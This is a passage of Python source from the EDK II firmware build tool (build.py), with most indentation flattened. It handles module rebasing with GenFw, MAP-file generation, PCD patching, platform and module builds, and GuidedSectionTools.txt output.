if not ModeIsSmm:
BaseAddress = BaseAddress - ModuleInfo.Image.Size
#
# Update Image to new BaseAddress by GenFw tool
#
LaunchCommand(["GenFw", "--rebase", str(BaseAddress), "-r", ModuleOutputImage], ModuleInfo.OutputDir)
LaunchCommand(["GenFw", "--rebase", str(BaseAddress), "-r", ModuleDebugImage], ModuleInfo.DebugDir)
else:
#
# Set new address to the section header only for SMM driver.
#
LaunchCommand(["GenFw", "--address", str(BaseAddress), "-r", ModuleOutputImage], ModuleInfo.OutputDir)
LaunchCommand(["GenFw", "--address", str(BaseAddress), "-r", ModuleDebugImage], ModuleInfo.DebugDir)
#
            # Collect function addresses from the Map file
#
ImageMapTable = ModuleOutputImage.replace('.efi', '.map')
FunctionList = []
if os.path.exists(ImageMapTable):
OrigImageBaseAddress = 0
ImageMap = open(ImageMapTable, 'r')
for LinStr in ImageMap:
if len (LinStr.strip()) == 0:
continue
#
# Get the preferred address set on link time.
#
if LinStr.find ('Preferred load address is') != -1:
StrList = LinStr.split()
OrigImageBaseAddress = int (StrList[len(StrList) - 1], 16)
StrList = LinStr.split()
if len (StrList) > 4:
if StrList[3] == 'f' or StrList[3] == 'F':
Name = StrList[1]
RelativeAddress = int (StrList[2], 16) - OrigImageBaseAddress
FunctionList.append ((Name, RelativeAddress))
if ModuleInfo.Arch == 'IPF' and Name.endswith('_ModuleEntryPoint'):
#
# Get the real entry point address for IPF image.
#
ModuleInfo.Image.EntryPoint = RelativeAddress
ImageMap.close()
#
# Add general information.
#
if ModeIsSmm:
MapBuffer.write('\n\n%s (Fixed SMRAM Offset, BaseAddress=0x%010X, EntryPoint=0x%010X)\n' % (ModuleName, BaseAddress, BaseAddress + ModuleInfo.Image.EntryPoint))
elif AddrIsOffset:
MapBuffer.write('\n\n%s (Fixed Memory Offset, BaseAddress=-0x%010X, EntryPoint=-0x%010X)\n' % (ModuleName, 0 - BaseAddress, 0 - (BaseAddress + ModuleInfo.Image.EntryPoint)))
else:
MapBuffer.write('\n\n%s (Fixed Memory Address, BaseAddress=0x%010X, EntryPoint=0x%010X)\n' % (ModuleName, BaseAddress, BaseAddress + ModuleInfo.Image.EntryPoint))
#
            # Add GUID and section base addresses.
#
TextSectionAddress = 0
DataSectionAddress = 0
for SectionHeader in ModuleInfo.Image.SectionHeaderList:
if SectionHeader[0] == '.text':
TextSectionAddress = SectionHeader[1]
elif SectionHeader[0] in ['.data', '.sdata']:
DataSectionAddress = SectionHeader[1]
if AddrIsOffset:
MapBuffer.write('(GUID=%s, .textbaseaddress=-0x%010X, .databaseaddress=-0x%010X)\n' % (ModuleInfo.Guid, 0 - (BaseAddress + TextSectionAddress), 0 - (BaseAddress + DataSectionAddress)))
else:
MapBuffer.write('(GUID=%s, .textbaseaddress=0x%010X, .databaseaddress=0x%010X)\n' % (ModuleInfo.Guid, BaseAddress + TextSectionAddress, BaseAddress + DataSectionAddress))
#
# Add debug image full path.
#
MapBuffer.write('(IMAGE=%s)\n\n' % (ModuleDebugImage))
#
            # Add function addresses
#
for Function in FunctionList:
if AddrIsOffset:
MapBuffer.write(' -0x%010X %s\n' % (0 - (BaseAddress + Function[1]), Function[0]))
else:
MapBuffer.write(' 0x%010X %s\n' % (BaseAddress + Function[1], Function[0]))
ImageMap.close()
#
# for SMM module in SMRAM, the SMRAM will be allocated from base to top.
#
if ModeIsSmm:
BaseAddress = BaseAddress + ModuleInfo.Image.Size
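    # Illustrative excerpt of the text written to MapBuffer above (module name,
    # GUID and addresses are made up):
    #
    #   SampleDxe (Fixed Memory Address, BaseAddress=0x00FFF40000, EntryPoint=0x00FFF40260)
    #   (GUID=xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx, .textbaseaddress=0x00FFF40260, .databaseaddress=0x00FFF41000)
    #   (IMAGE=<DebugDir>/SampleDxe.efi)
    #     0x00FFF40260  _ModuleEntryPoint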
## Collect MAP information of all FVs
#
def _CollectFvMapBuffer (self, MapBuffer, Wa, ModuleList):
if self.Fdf:
# First get the XIP base address for FV map file.
GuidPattern = re.compile("[-a-fA-F0-9]+")
GuidName = re.compile("\(GUID=[-a-fA-F0-9]+")
for FvName in Wa.FdfProfile.FvDict:
FvMapBuffer = os.path.join(Wa.FvDir, FvName + '.Fv.map')
if not os.path.exists(FvMapBuffer):
continue
FvMap = open(FvMapBuffer, 'r')
#skip FV size information
FvMap.readline()
FvMap.readline()
FvMap.readline()
FvMap.readline()
for Line in FvMap:
MatchGuid = GuidPattern.match(Line)
if MatchGuid is not None:
#
# Replace GUID with module name
#
GuidString = MatchGuid.group()
if GuidString.upper() in ModuleList:
Line = Line.replace(GuidString, ModuleList[GuidString.upper()].Name)
MapBuffer.write(Line)
#
# Add the debug image full path.
#
MatchGuid = GuidName.match(Line)
if MatchGuid is not None:
GuidString = MatchGuid.group().split("=")[1]
if GuidString.upper() in ModuleList:
MapBuffer.write('(IMAGE=%s)\n' % (os.path.join(ModuleList[GuidString.upper()].DebugDir, ModuleList[GuidString.upper()].Name + '.efi')))
FvMap.close()
## Collect MAP information of all modules
#
def _CollectModuleMapBuffer (self, MapBuffer, ModuleList):
sys.stdout.write ("Generate Load Module At Fix Address Map")
sys.stdout.flush()
PatchEfiImageList = []
PeiModuleList = {}
BtModuleList = {}
RtModuleList = {}
SmmModuleList = {}
PeiSize = 0
BtSize = 0
RtSize = 0
        # reserve 4K in SMRAM so that SMM module addresses do not start from 0.
SmmSize = 0x1000
IsIpfPlatform = False
if 'IPF' in self.ArchList:
IsIpfPlatform = True
for ModuleGuid in ModuleList:
Module = ModuleList[ModuleGuid]
GlobalData.gProcessingFile = "%s [%s, %s, %s]" % (Module.MetaFile, Module.Arch, Module.ToolChain, Module.BuildTarget)
OutputImageFile = ''
for ResultFile in Module.CodaTargetList:
if str(ResultFile.Target).endswith('.efi'):
#
# module list for PEI, DXE, RUNTIME and SMM
#
OutputImageFile = os.path.join(Module.OutputDir, Module.Name + '.efi')
ImageClass = PeImageClass (OutputImageFile)
if not ImageClass.IsValid:
EdkLogger.error("build", FILE_PARSE_FAILURE, ExtraData=ImageClass.ErrorInfo)
ImageInfo = PeImageInfo(Module.Name, Module.Guid, Module.Arch, Module.OutputDir, Module.DebugDir, ImageClass)
if Module.ModuleType in [SUP_MODULE_PEI_CORE, SUP_MODULE_PEIM, EDK_COMPONENT_TYPE_COMBINED_PEIM_DRIVER, EDK_COMPONENT_TYPE_PIC_PEIM, EDK_COMPONENT_TYPE_RELOCATABLE_PEIM, SUP_MODULE_DXE_CORE]:
PeiModuleList[Module.MetaFile] = ImageInfo
PeiSize += ImageInfo.Image.Size
elif Module.ModuleType in [EDK_COMPONENT_TYPE_BS_DRIVER, SUP_MODULE_DXE_DRIVER, SUP_MODULE_UEFI_DRIVER]:
BtModuleList[Module.MetaFile] = ImageInfo
BtSize += ImageInfo.Image.Size
elif Module.ModuleType in [SUP_MODULE_DXE_RUNTIME_DRIVER, EDK_COMPONENT_TYPE_RT_DRIVER, SUP_MODULE_DXE_SAL_DRIVER, EDK_COMPONENT_TYPE_SAL_RT_DRIVER]:
RtModuleList[Module.MetaFile] = ImageInfo
#IPF runtime driver needs to be at 2 page alignment.
if IsIpfPlatform and ImageInfo.Image.Size % 0x2000 != 0:
ImageInfo.Image.Size = (ImageInfo.Image.Size / 0x2000 + 1) * 0x2000
RtSize += ImageInfo.Image.Size
elif Module.ModuleType in [SUP_MODULE_SMM_CORE, SUP_MODULE_DXE_SMM_DRIVER, SUP_MODULE_MM_STANDALONE, SUP_MODULE_MM_CORE_STANDALONE]:
SmmModuleList[Module.MetaFile] = ImageInfo
SmmSize += ImageInfo.Image.Size
if Module.ModuleType == SUP_MODULE_DXE_SMM_DRIVER:
PiSpecVersion = Module.Module.Specification.get('PI_SPECIFICATION_VERSION', '0x00000000')
# for PI specification < PI1.1, DXE_SMM_DRIVER also runs as BOOT time driver.
if int(PiSpecVersion, 16) < 0x0001000A:
BtModuleList[Module.MetaFile] = ImageInfo
BtSize += ImageInfo.Image.Size
break
#
# EFI image is final target.
# Check EFI image contains patchable FixAddress related PCDs.
#
if OutputImageFile != '':
ModuleIsPatch = False
for Pcd in Module.ModulePcdList:
if Pcd.Type == TAB_PCDS_PATCHABLE_IN_MODULE and Pcd.TokenCName in TAB_PCDS_PATCHABLE_LOAD_FIX_ADDRESS_SET:
ModuleIsPatch = True
break
if not ModuleIsPatch:
for Pcd in Module.LibraryPcdList:
if Pcd.Type == TAB_PCDS_PATCHABLE_IN_MODULE and Pcd.TokenCName in TAB_PCDS_PATCHABLE_LOAD_FIX_ADDRESS_SET:
ModuleIsPatch = True
break
if not ModuleIsPatch:
continue
#
# Module includes the patchable load fix address PCDs.
# It will be fixed up later.
#
PatchEfiImageList.append (OutputImageFile)
#
# Get Top Memory address
#
ReservedRuntimeMemorySize = 0
TopMemoryAddress = 0
if self.LoadFixAddress == 0xFFFFFFFFFFFFFFFF:
TopMemoryAddress = 0
else:
TopMemoryAddress = self.LoadFixAddress
if TopMemoryAddress < RtSize + BtSize + PeiSize:
EdkLogger.error("build", PARAMETER_INVALID, "FIX_LOAD_TOP_MEMORY_ADDRESS is too low to load driver")
# Make IPF runtime driver at 2 page alignment.
if IsIpfPlatform:
ReservedRuntimeMemorySize = TopMemoryAddress % 0x2000
RtSize = RtSize + ReservedRuntimeMemorySize
#
# Patch FixAddress related PCDs into EFI image
#
for EfiImage in PatchEfiImageList:
EfiImageMap = EfiImage.replace('.efi', '.map')
if not os.path.exists(EfiImageMap):
continue
#
# Get PCD offset in EFI image by GenPatchPcdTable function
#
PcdTable = parsePcdInfoFromMapFile(EfiImageMap, EfiImage)
#
# Patch real PCD value by PatchPcdValue tool
#
for PcdInfo in PcdTable:
ReturnValue = 0
if PcdInfo[0] == TAB_PCDS_PATCHABLE_LOAD_FIX_ADDRESS_PEI_PAGE_SIZE:
ReturnValue, ErrorInfo = PatchBinaryFile (EfiImage, PcdInfo[1], TAB_PCDS_PATCHABLE_LOAD_FIX_ADDRESS_PEI_PAGE_SIZE_DATA_TYPE, str (PeiSize / 0x1000))
elif PcdInfo[0] == TAB_PCDS_PATCHABLE_LOAD_FIX_ADDRESS_DXE_PAGE_SIZE:
ReturnValue, ErrorInfo = PatchBinaryFile (EfiImage, PcdInfo[1], TAB_PCDS_PATCHABLE_LOAD_FIX_ADDRESS_DXE_PAGE_SIZE_DATA_TYPE, str (BtSize / 0x1000))
elif PcdInfo[0] == TAB_PCDS_PATCHABLE_LOAD_FIX_ADDRESS_RUNTIME_PAGE_SIZE:
ReturnValue, ErrorInfo = PatchBinaryFile (EfiImage, PcdInfo[1], TAB_PCDS_PATCHABLE_LOAD_FIX_ADDRESS_RUNTIME_PAGE_SIZE_DATA_TYPE, str (RtSize / 0x1000))
elif PcdInfo[0] == TAB_PCDS_PATCHABLE_LOAD_FIX_ADDRESS_SMM_PAGE_SIZE and len (SmmModuleList) > 0:
ReturnValue, ErrorInfo = PatchBinaryFile (EfiImage, PcdInfo[1], TAB_PCDS_PATCHABLE_LOAD_FIX_ADDRESS_SMM_PAGE_SIZE_DATA_TYPE, str (SmmSize / 0x1000))
if ReturnValue != 0:
EdkLogger.error("build", PARAMETER_INVALID, "Patch PCD value failed", ExtraData=ErrorInfo)
MapBuffer.write('PEI_CODE_PAGE_NUMBER = 0x%x\n' % (PeiSize / 0x1000))
MapBuffer.write('BOOT_CODE_PAGE_NUMBER = 0x%x\n' % (BtSize / 0x1000))
MapBuffer.write('RUNTIME_CODE_PAGE_NUMBER = 0x%x\n' % (RtSize / 0x1000))
if len (SmmModuleList) > 0:
MapBuffer.write('SMM_CODE_PAGE_NUMBER = 0x%x\n' % (SmmSize / 0x1000))
PeiBaseAddr = TopMemoryAddress - RtSize - BtSize
BtBaseAddr = TopMemoryAddress - RtSize
RtBaseAddr = TopMemoryAddress - ReservedRuntimeMemorySize
self._RebaseModule (MapBuffer, PeiBaseAddr, PeiModuleList, TopMemoryAddress == 0)
self._RebaseModule (MapBuffer, BtBaseAddr, BtModuleList, TopMemoryAddress == 0)
self._RebaseModule (MapBuffer, RtBaseAddr, RtModuleList, TopMemoryAddress == 0)
self._RebaseModule (MapBuffer, 0x1000, SmmModuleList, AddrIsOffset=False, ModeIsSmm=True)
MapBuffer.write('\n\n')
sys.stdout.write ("\n")
sys.stdout.flush()
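    # Illustrative header lines written to MapBuffer above (page counts are examples):
    #
    #   PEI_CODE_PAGE_NUMBER = 0x20
    #   BOOT_CODE_PAGE_NUMBER = 0x1e0
    #   RUNTIME_CODE_PAGE_NUMBER = 0x40
    #   SMM_CODE_PAGE_NUMBER = 0x30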
## Save platform Map file
#
def _SaveMapFile (self, MapBuffer, Wa):
#
        # Compose the map file path.
#
MapFilePath = os.path.join(Wa.BuildDir, Wa.Name + '.map')
#
# Save address map into MAP file.
#
SaveFileOnChange(MapFilePath, MapBuffer.getvalue(), False)
MapBuffer.close()
if self.LoadFixAddress != 0:
sys.stdout.write ("\nLoad Module At Fix Address Map file can be found at %s\n" % (MapFilePath))
sys.stdout.flush()
## Build active platform for different build targets and different tool chains
#
def _BuildPlatform(self):
SaveFileOnChange(self.PlatformBuildPath, '# DO NOT EDIT \n# FILE auto-generated\n', False)
for BuildTarget in self.BuildTargetList:
GlobalData.gGlobalDefines['TARGET'] = BuildTarget
index = 0
for ToolChain in self.ToolChainList:
GlobalData.gGlobalDefines['TOOLCHAIN'] = ToolChain
GlobalData.gGlobalDefines['TOOL_CHAIN_TAG'] = ToolChain
GlobalData.gGlobalDefines['FAMILY'] = self.ToolChainFamily[index]
index += 1
Wa = WorkspaceAutoGen(
self.WorkspaceDir,
self.PlatformFile,
BuildTarget,
ToolChain,
self.ArchList,
self.BuildDatabase,
self.TargetTxt,
self.ToolDef,
self.Fdf,
self.FdList,
self.FvList,
self.CapList,
self.SkuId,
self.UniFlag,
self.Progress
)
self.Fdf = Wa.FdfFile
self.LoadFixAddress = Wa.Platform.LoadFixAddress
self.BuildReport.AddPlatformReport(Wa)
self.Progress.Stop("done!")
# Add ffs build to makefile
CmdListDict = {}
if GlobalData.gEnableGenfdsMultiThread and self.Fdf:
CmdListDict = self._GenFfsCmd()
for Arch in Wa.ArchList:
GlobalData.gGlobalDefines['ARCH'] = Arch
Pa = PlatformAutoGen(Wa, self.PlatformFile, BuildTarget, ToolChain, Arch)
for Module in Pa.Platform.Modules:
# Get ModuleAutoGen object to generate C code file and makefile
Ma = ModuleAutoGen(Wa, Module, BuildTarget, ToolChain, Arch, self.PlatformFile)
if Ma is None:
continue
self.BuildModules.append(Ma)
self._BuildPa(self.Target, Pa, FfsCommand=CmdListDict)
# Create MAP file when Load Fix Address is enabled.
if self.Target in ["", "all", "fds"]:
for Arch in Wa.ArchList:
GlobalData.gGlobalDefines['ARCH'] = Arch
#
# Check whether the set fix address is above 4G for 32bit image.
#
if (Arch == 'IA32' or Arch == 'ARM') and self.LoadFixAddress != 0xFFFFFFFFFFFFFFFF and self.LoadFixAddress >= 0x100000000:
EdkLogger.error("build", PARAMETER_INVALID, "FIX_LOAD_TOP_MEMORY_ADDRESS can't be set to larger than or equal to 4G for the platform with IA32 or ARM arch modules")
#
# Get Module List
#
ModuleList = {}
for Pa in Wa.AutoGenObjectList:
for Ma in Pa.ModuleAutoGenList:
if Ma is None:
continue
if not Ma.IsLibrary:
ModuleList[Ma.Guid.upper()] = Ma
MapBuffer = BytesIO('')
if self.LoadFixAddress != 0:
#
# Rebase module to the preferred memory address before GenFds
#
self._CollectModuleMapBuffer(MapBuffer, ModuleList)
if self.Fdf:
#
# create FDS again for the updated EFI image
#
self._Build("fds", Wa)
#
# Create MAP file for all platform FVs after GenFds.
#
self._CollectFvMapBuffer(MapBuffer, Wa, ModuleList)
#
# Save MAP buffer into MAP file.
#
self._SaveMapFile (MapBuffer, Wa)
## Build active module for different build targets, different tool chains and different archs
#
def _BuildModule(self):
for BuildTarget in self.BuildTargetList:
GlobalData.gGlobalDefines['TARGET'] = BuildTarget
index = 0
for ToolChain in self.ToolChainList:
WorkspaceAutoGenTime = time.time()
GlobalData.gGlobalDefines['TOOLCHAIN'] = ToolChain
GlobalData.gGlobalDefines['TOOL_CHAIN_TAG'] = ToolChain
GlobalData.gGlobalDefines['FAMILY'] = self.ToolChainFamily[index]
index += 1
#
# module build needs platform build information, so get platform
# AutoGen first
#
Wa = WorkspaceAutoGen(
self.WorkspaceDir,
self.PlatformFile,
BuildTarget,
ToolChain,
self.ArchList,
self.BuildDatabase,
self.TargetTxt,
self.ToolDef,
self.Fdf,
self.FdList,
self.FvList,
self.CapList,
self.SkuId,
self.UniFlag,
self.Progress,
self.ModuleFile
)
self.Fdf = Wa.FdfFile
self.LoadFixAddress = Wa.Platform.LoadFixAddress
Wa.CreateMakeFile(False)
# Add ffs build to makefile
CmdListDict = None
if GlobalData.gEnableGenfdsMultiThread and self.Fdf:
CmdListDict = self._GenFfsCmd()
self.Progress.Stop("done!")
MaList = []
ExitFlag = threading.Event()
ExitFlag.clear()
self.AutoGenTime += int(round((time.time() - WorkspaceAutoGenTime)))
for Arch in Wa.ArchList:
AutoGenStart = time.time()
GlobalData.gGlobalDefines['ARCH'] = Arch
Pa = PlatformAutoGen(Wa, self.PlatformFile, BuildTarget, ToolChain, Arch)
for Module in Pa.Platform.Modules:
if self.ModuleFile.Dir == Module.Dir and self.ModuleFile.Name == Module.Name:
Ma = ModuleAutoGen(Wa, Module, BuildTarget, ToolChain, Arch, self.PlatformFile)
if Ma is None: continue
MaList.append(Ma)
if Ma.CanSkipbyHash():
self.HashSkipModules.append(Ma)
continue
                            # Do not auto-gen for the 'clean', 'cleanlib', 'cleanall', 'run', 'fds' targets
if self.Target not in ['clean', 'cleanlib', 'cleanall', 'run', 'fds']:
# for target which must generate AutoGen code and makefile
if not self.SkipAutoGen or self.Target == 'genc':
self.Progress.Start("Generating code")
Ma.CreateCodeFile(True)
self.Progress.Stop("done!")
if self.Target == "genc":
return True
if not self.SkipAutoGen or self.Target == 'genmake':
self.Progress.Start("Generating makefile")
if CmdListDict and self.Fdf and (Module.File, Arch) in CmdListDict:
Ma.CreateMakeFile(True, CmdListDict[Module.File, Arch])
del CmdListDict[Module.File, Arch]
else:
Ma.CreateMakeFile(True)
self.Progress.Stop("done!")
if self.Target == "genmake":
return True
self.BuildModules.append(Ma)
self.AutoGenTime += int(round((time.time() - AutoGenStart)))
MakeStart = time.time()
for Ma in self.BuildModules:
if not Ma.IsBinaryModule:
Bt = BuildTask.New(ModuleMakeUnit(Ma, self.Target))
# Break build if any build thread has error
if BuildTask.HasError():
# we need a full version of makefile for platform
ExitFlag.set()
BuildTask.WaitForComplete()
Pa.CreateMakeFile(False)
EdkLogger.error("build", BUILD_ERROR, "Failed to build module", ExtraData=GlobalData.gBuildingModule)
# Start task scheduler
if not BuildTask.IsOnGoing():
BuildTask.StartScheduler(self.ThreadNumber, ExitFlag)
                # in case there's an interruption, we need a full version of the platform makefile
Pa.CreateMakeFile(False)
if BuildTask.HasError():
EdkLogger.error("build", BUILD_ERROR, "Failed to build module", ExtraData=GlobalData.gBuildingModule)
self.MakeTime += int(round((time.time() - MakeStart)))
                MakeContinue = time.time()
ExitFlag.set()
BuildTask.WaitForComplete()
self.CreateAsBuiltInf()
                self.MakeTime += int(round((time.time() - MakeContinue)))
if BuildTask.HasError():
EdkLogger.error("build", BUILD_ERROR, "Failed to build module", ExtraData=GlobalData.gBuildingModule)
self.BuildReport.AddPlatformReport(Wa, MaList)
if MaList == []:
EdkLogger.error(
'build',
BUILD_ERROR,
"Module for [%s] is not a component of active platform."\
" Please make sure that the ARCH and inf file path are"\
" given in the same as in [%s]" % \
(', '.join(Wa.ArchList), self.PlatformFile),
ExtraData=self.ModuleFile
)
# Create MAP file when Load Fix Address is enabled.
if self.Target == "fds" and self.Fdf:
for Arch in Wa.ArchList:
#
# Check whether the set fix address is above 4G for 32bit image.
#
if (Arch == 'IA32' or Arch == 'ARM') and self.LoadFixAddress != 0xFFFFFFFFFFFFFFFF and self.LoadFixAddress >= 0x100000000:
                            EdkLogger.error("build", PARAMETER_INVALID, "FIX_LOAD_TOP_MEMORY_ADDRESS can't be set to larger than or equal to 4G for the platform with IA32 or ARM arch modules")
#
# Get Module List
#
ModuleList = {}
for Pa in Wa.AutoGenObjectList:
for Ma in Pa.ModuleAutoGenList:
if Ma is None:
continue
if not Ma.IsLibrary:
ModuleList[Ma.Guid.upper()] = Ma
MapBuffer = BytesIO('')
if self.LoadFixAddress != 0:
#
# Rebase module to the preferred memory address before GenFds
#
self._CollectModuleMapBuffer(MapBuffer, ModuleList)
#
# create FDS again for the updated EFI image
#
GenFdsStart = time.time()
self._Build("fds", Wa)
self.GenFdsTime += int(round((time.time() - GenFdsStart)))
#
# Create MAP file for all platform FVs after GenFds.
#
self._CollectFvMapBuffer(MapBuffer, Wa, ModuleList)
#
# Save MAP buffer into MAP file.
#
self._SaveMapFile (MapBuffer, Wa)
def _GenFfsCmd(self):
# convert dictionary of Cmd:(Inf,Arch)
# to a new dictionary of (Inf,Arch):Cmd,Cmd,Cmd...
CmdSetDict = defaultdict(set)
GenFfsDict = GenFds.GenFfsMakefile('', GlobalData.gFdfParser, self, self.ArchList, GlobalData)
for Cmd in GenFfsDict:
tmpInf, tmpArch = GenFfsDict[Cmd]
CmdSetDict[tmpInf, tmpArch].add(Cmd)
return CmdSetDict
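    # The returned CmdSetDict maps each (module INF, arch) pair to the set of FFS
    # generation make commands collected from GenFds.GenFfsMakefile(); _BuildPlatform(),
    # _BuildModule() and _MultiThreadBuildPlatform() pass it on to CreateMakeFile()
    # as the FfsCommand/CmdListDict argument.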
## Build a platform in multi-thread mode
#
def _MultiThreadBuildPlatform(self):
SaveFileOnChange(self.PlatformBuildPath, '# DO NOT EDIT \n# FILE auto-generated\n', False)
for BuildTarget in self.BuildTargetList:
GlobalData.gGlobalDefines['TARGET'] = BuildTarget
index = 0
for ToolChain in self.ToolChainList:
WorkspaceAutoGenTime = time.time()
GlobalData.gGlobalDefines['TOOLCHAIN'] = ToolChain
GlobalData.gGlobalDefines['TOOL_CHAIN_TAG'] = ToolChain
GlobalData.gGlobalDefines['FAMILY'] = self.ToolChainFamily[index]
index += 1
Wa = WorkspaceAutoGen(
self.WorkspaceDir,
self.PlatformFile,
BuildTarget,
ToolChain,
self.ArchList,
self.BuildDatabase,
self.TargetTxt,
self.ToolDef,
self.Fdf,
self.FdList,
self.FvList,
self.CapList,
self.SkuId,
self.UniFlag,
self.Progress
)
self.Fdf = Wa.FdfFile
self.LoadFixAddress = Wa.Platform.LoadFixAddress
self.BuildReport.AddPlatformReport(Wa)
Wa.CreateMakeFile(False)
# Add ffs build to makefile
CmdListDict = None
if GlobalData.gEnableGenfdsMultiThread and self.Fdf:
CmdListDict = self._GenFfsCmd()
# multi-thread exit flag
ExitFlag = threading.Event()
ExitFlag.clear()
self.AutoGenTime += int(round((time.time() - WorkspaceAutoGenTime)))
for Arch in Wa.ArchList:
AutoGenStart = time.time()
GlobalData.gGlobalDefines['ARCH'] = Arch
Pa = PlatformAutoGen(Wa, self.PlatformFile, BuildTarget, ToolChain, Arch)
if Pa is None:
continue
ModuleList = []
for Inf in Pa.Platform.Modules:
ModuleList.append(Inf)
# Add the INF only list in FDF
if GlobalData.gFdfParser is not None:
for InfName in GlobalData.gFdfParser.Profile.InfList:
Inf = PathClass(NormPath(InfName), self.WorkspaceDir, Arch)
if Inf in Pa.Platform.Modules:
continue
ModuleList.append(Inf)
for Module in ModuleList:
# Get ModuleAutoGen object to generate C code file and makefile
Ma = ModuleAutoGen(Wa, Module, BuildTarget, ToolChain, Arch, self.PlatformFile)
if Ma is None:
continue
if Ma.CanSkipbyHash():
self.HashSkipModules.append(Ma)
continue
                    # Do not auto-gen for the 'clean', 'cleanlib', 'cleanall', 'run', 'fds' targets
if self.Target not in ['clean', 'cleanlib', 'cleanall', 'run', 'fds']:
# for target which must generate AutoGen code and makefile
if not self.SkipAutoGen or self.Target == 'genc':
Ma.CreateCodeFile(True)
if self.Target == "genc":
continue
if not self.SkipAutoGen or self.Target == 'genmake':
if CmdListDict and self.Fdf and (Module.File, Arch) in CmdListDict:
Ma.CreateMakeFile(True, CmdListDict[Module.File, Arch])
del CmdListDict[Module.File, Arch]
else:
Ma.CreateMakeFile(True)
if self.Target == "genmake":
continue
self.BuildModules.append(Ma)
self.Progress.Stop("done!")
self.AutoGenTime += int(round((time.time() - AutoGenStart)))
MakeStart = time.time()
for Ma in self.BuildModules:
# Generate build task for the module
if not Ma.IsBinaryModule:
Bt = BuildTask.New(ModuleMakeUnit(Ma, self.Target))
# Break build if any build thread has error
if BuildTask.HasError():
# we need a full version of makefile for platform
ExitFlag.set()
BuildTask.WaitForComplete()
Pa.CreateMakeFile(False)
EdkLogger.error("build", BUILD_ERROR, "Failed to build module", ExtraData=GlobalData.gBuildingModule)
# Start task scheduler
if not BuildTask.IsOnGoing():
BuildTask.StartScheduler(self.ThreadNumber, ExitFlag)
                # in case there's an interruption, we need a full version of the platform makefile
Pa.CreateMakeFile(False)
if BuildTask.HasError():
EdkLogger.error("build", BUILD_ERROR, "Failed to build module", ExtraData=GlobalData.gBuildingModule)
self.MakeTime += int(round((time.time() - MakeStart)))
                MakeContinue = time.time()
#
#
# All modules have been put in build tasks queue. Tell task scheduler
# to exit if all tasks are completed
#
ExitFlag.set()
BuildTask.WaitForComplete()
self.CreateAsBuiltInf()
                self.MakeTime += int(round((time.time() - MakeContinue)))
#
# Check for build error, and raise exception if one
# has been signaled.
#
if BuildTask.HasError():
EdkLogger.error("build", BUILD_ERROR, "Failed to build module", ExtraData=GlobalData.gBuildingModule)
# Create MAP file when Load Fix Address is enabled.
if self.Target in ["", "all", "fds"]:
for Arch in Wa.ArchList:
#
# Check whether the set fix address is above 4G for 32bit image.
#
if (Arch == 'IA32' or Arch == 'ARM') and self.LoadFixAddress != 0xFFFFFFFFFFFFFFFF and self.LoadFixAddress >= 0x100000000:
                            EdkLogger.error("build", PARAMETER_INVALID, "FIX_LOAD_TOP_MEMORY_ADDRESS can't be set to larger than or equal to 4G for the platform with IA32 or ARM arch modules")
#
# Get Module List
#
ModuleList = {}
for Pa in Wa.AutoGenObjectList:
for Ma in Pa.ModuleAutoGenList:
if Ma is None:
continue
if not Ma.IsLibrary:
ModuleList[Ma.Guid.upper()] = Ma
#
# Rebase module to the preferred memory address before GenFds
#
MapBuffer = BytesIO('')
if self.LoadFixAddress != 0:
self._CollectModuleMapBuffer(MapBuffer, ModuleList)
if self.Fdf:
#
# Generate FD image if there's a FDF file found
#
GenFdsStart = time.time()
if GenFdsApi(Wa.GenFdsCommandDict, self.Db):
EdkLogger.error("build", COMMAND_FAILURE)
#
# Create MAP file for all platform FVs after GenFds.
#
self._CollectFvMapBuffer(MapBuffer, Wa, ModuleList)
self.GenFdsTime += int(round((time.time() - GenFdsStart)))
#
# Save MAP buffer into MAP file.
#
self._SaveMapFile(MapBuffer, Wa)
## Generate GuidedSectionTools.txt in the FV directories.
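    # Each line written to GuidedSectionTools.txt has the form (illustrative;
    # the actual values come from the *_GUID and *_PATH entries in the tool definitions):
    #   <section guid, lower case> <tool name> <full path to the tool executable>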
#
def CreateGuidedSectionToolsFile(self):
for BuildTarget in self.BuildTargetList:
for ToolChain in self.ToolChainList:
Wa = WorkspaceAutoGen(
self.WorkspaceDir,
self.PlatformFile,
BuildTarget,
ToolChain,
self.ArchList,
self.BuildDatabase,
self.TargetTxt,
self.ToolDef,
self.Fdf,
self.FdList,
self.FvList,
self.CapList,
self.SkuId,
self.UniFlag
)
FvDir = Wa.FvDir
if not os.path.exists(FvDir):
continue
for Arch in self.ArchList:
# Build up the list of supported architectures for this build
prefix = '%s_%s_%s_' % (BuildTarget, ToolChain, Arch)
# Look through the tool definitions for GUIDed tools
guidAttribs = []
for (attrib, value) in self.ToolDef.ToolsDefTxtDictionary.iteritems():
if attrib.upper().endswith('_GUID'):
split = attrib.split('_')
thisPrefix = '_'.join(split[0:3]) + '_'
if thisPrefix == prefix:
guid = self.ToolDef.ToolsDefTxtDictionary[attrib]
guid = guid.lower()
toolName = split[3]
path = '_'.join(split[0:4]) + '_PATH'
path = self.ToolDef.ToolsDefTxtDictionary[path]
path = self.GetFullPathOfTool(path)
guidAttribs.append((guid, toolName, path))
# Write out GuidedSecTools.txt
toolsFile = os.path.join(FvDir, 'GuidedSectionTools.txt')
toolsFile = open(toolsFile, 'wt')
for guidedSectionTool in guidAttribs:
print(' '.join(guidedSectionTool), file=toolsFile)
toolsFile.close()
## Returns the full path of the tool.
#
def GetFullPathOfTool (self, tool):
if os.path.exists(tool):
return os.path.realpath(tool)
else:
# We need to search for the tool using the
# PATH environment variable.
for dirInPath in os.environ['PATH'].split(os.pathsep):
foundPath = os.path.join(dirInPath, tool)
if os.path.exists(foundPath):
return os.path.realpath(foundPath)
# If the tool was not found in the path then we just return
# the input tool.
return tool
## Launch the module or platform build
#
def Launch(self):
if not self.ModuleFile:
if not self.SpawnMode or self.Target not in ["", "all"]:
self.SpawnMode = False
self._BuildPlatform()
else:
self._MultiThreadBuildPlatform()
self.CreateGuidedSectionToolsFile()
else:
self.SpawnMode = False
self._BuildModule()
if self.Target == 'cleanall':
RemoveDirectory(os.path.dirname(GlobalData.gDatabasePath), True)
def CreateAsBuiltInf(self):
for Module in self.BuildModules:
Module.CreateAsBuiltInf()
for Module in self.HashSkipModules:
Module.CreateAsBuiltInf(True)
self.BuildModules = []
self.HashSkipModules = []
## Do some clean-up works when error occurred
def Relinquish(self):
OldLogLevel = EdkLogger.GetLevel()
EdkLogger.SetLevel(EdkLogger.ERROR)
#self.DumpBuildData()
Utils.Progressor.Abort()
if self.SpawnMode == True:
BuildTask.Abort()
